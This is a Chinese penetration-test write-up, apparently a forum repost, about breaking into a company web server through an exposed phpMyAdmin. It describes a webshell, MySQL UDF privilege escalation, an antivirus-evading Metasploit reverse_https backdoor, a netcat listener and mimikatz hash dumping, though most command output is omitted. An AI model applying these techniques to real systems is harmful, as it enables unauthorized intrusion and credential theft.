一次简单的渗透过程[未完成]

涉及隐私 ip隐去
目标(某国外企业站):www.91ri.org ip:192.168.1.8
目标主站未发现 动态脚本(asp,jsp,cfm,php,aspx…)
故 从其它地方入手

0x01 搜集域名信息:
使用google 搜索二级 域名:

使用:dnsenum 探测二级域名

使用这两种常用手法均未找到相关二级域名

使用 御剑轻量级旁注查询工具 未找到该公司相关的 域名…

0x02 初步漏洞探测:
在这里我使用一个小工具wss.exe  (不知道该工具出处 听说是safe3 web漏洞扫描里面的)
该工具扫描漏洞能力并不强,但是能快速扫描出 一个c段中简单的一些 web 漏洞在前期快速寻找漏洞站点 。
我很喜欢这个工具 ,这里我写个批处理来方便使用。

11

不多时就扫描完成了,查看扫描结果。

12

 

结果还是令人满意的,一个注入、一个敏感目录。

既然已经扫描出漏洞我们先别急着日下来 万一跟目标毫无关系岂不是白日了?
外网的情况下如何判断是否处在同一内网呢?
我们可以使路由跟踪命令tracert 命令看看是否经过相同路由

tracert 命令 技巧:
直接 tracert ip 会很慢 而且容易超时
我们使用 tracert -4 -d -w 100 127.0.0.1
选项:

设置些参数优化下速度会快很多而且更直观。

13

 

很遗憾 跳不过去
我们可以使用
0trace (注意是零不是欧) backtrack 5下以集成不过在这里我们使用 0trace 的增强版 intrace
intrace 的安装非常简单的:

使用方法

-s 参数发送数据包大小 -p 设置端口

由于该工具不是通过常规的主动的方式路由跟踪,而是通过tcp连接被动的来跟踪,所以我们还要对目标进行访问。
在这里我对目标发送个http数据包。

14

 

很好成功到达目标。分析最后经过的路由,发现与目标一致,所以判断是同一内网。

http://www.91ri.org/myadmin/main.php (url以经过处理)
访问之发现是phpmyadmin 而且直接登录进去
select user()
root 权限…
通过/libraries/select_lang.lib.php 获取web绝对路径为:

发现连接被重置,难道是web防火墙? 不过丝毫不用担心,php 很好突破…
通过http://www.expdoor.com/article/5.html 站点找到一个过防火墙的php一句话shell

菜刀连接 密码 1 成个getshell

15

首先想到的是 whoami 看看是否是系统权限  没想到 不可以执行命令…
菜刀说 是开启了安全模式 但不一定
我们看看 phpinfo 发现 safe_mode 为 Off  并且 disable_functions no value
估计是没权限执行吧。
题外话:
如果是 有权限执行cmd 但开启安全模式或者设置了 disable_function 在低版本php (PHP <= 5.2.9)
win32环境 下 是可以绕过的
参考文章:
PHP 5.x COM functions safe_mode and disable_function bypass

安全模式下exec等函数安全隐患 PHP <= 5.2.9 Local Safemod Bypass Exploit
http://huaidan.org/archives/3140.html
http://luoq.net/PHP-COM-functions/

目标虽然是低版本 (PHP Version 5.2.4)
但是 并不是开启安全模式 所以不适用该方法…

mysql root权限 我们并不用考虑 php 能不能执行 命令
先 udf 提权

发现是5.0 低于5.1可以直接将dll文件传至 c:windows目录

我喜欢用 sqlmap里面的 dll 一般都不会被杀软干掉
相关链接 https://github.com/mysqludf/lib_mysqludf_sys

该dll 提供三个函数:

我们通常使用 sys_eval 函数就够了…

这里有个小技巧:
dll文件有些大 直接通过 select 0x.. into outdump 方式写入比较麻烦(当然有很多一步完成的脚本)
我们可以将文件上传至任意可写目录然后 通过load_file()函数读该文件 同时将其 写入 c:windows

具体步骤:
event.cpp 反弹

编译过程省略
为什么不用nc 呢?nc容易被干掉。
这个反弹命令很简洁 n.exe ip port 很少被杀掉。
将依照上面的方法上传udf 的步骤,将该文件上传至可写目录。
本地监听 执行之…
nc -lvv 443 发现有数据返回 但一执行命令就退出… (将一切未知异常 归咎为 安全软件在作祟…)
怎么办???   试试 metasploit 里面的 windows/meterpreter/reverse_https  (meterpreter https 反向shell)
生成一个后门:

未作任何处理 上传上去发现被干掉.早就该意料到…

被干掉没关系的 metasploit支持各种 编码 并且可以自定义 任意exe 文件 模板 来免杀

16

经过多层多种编码,并且定义一个模板文件。
相关编码就不解释了,反正我也不懂具体如何编码的…

-x 选项使用任意的windows可执行程序作为模板文件 这里我选了procdump.exe (微软的小工具) 作为模板文件

执行:

use multi/handler 不用解释吧

设置下面两个参数是为了 持久性 https 连接 防止意外中断
即使中断了也可以继续..
SessionCommunicationTimeout=0
SessionExpirationTimeout=0

将后门上传上去 发现没有被杀…

meterpreter 也正常使用
由于是系统权限执行 的所以可以直接gethash

17

看看meterpreter 插件:

支持 mimikatz :)  很人性化..

18

没抓到有用的,系统用户明文,因为没有登录嘛~

19

20

本站不提供工具下载,文中提到的工具请前往原文链接。

[via@90sec / 露小缝]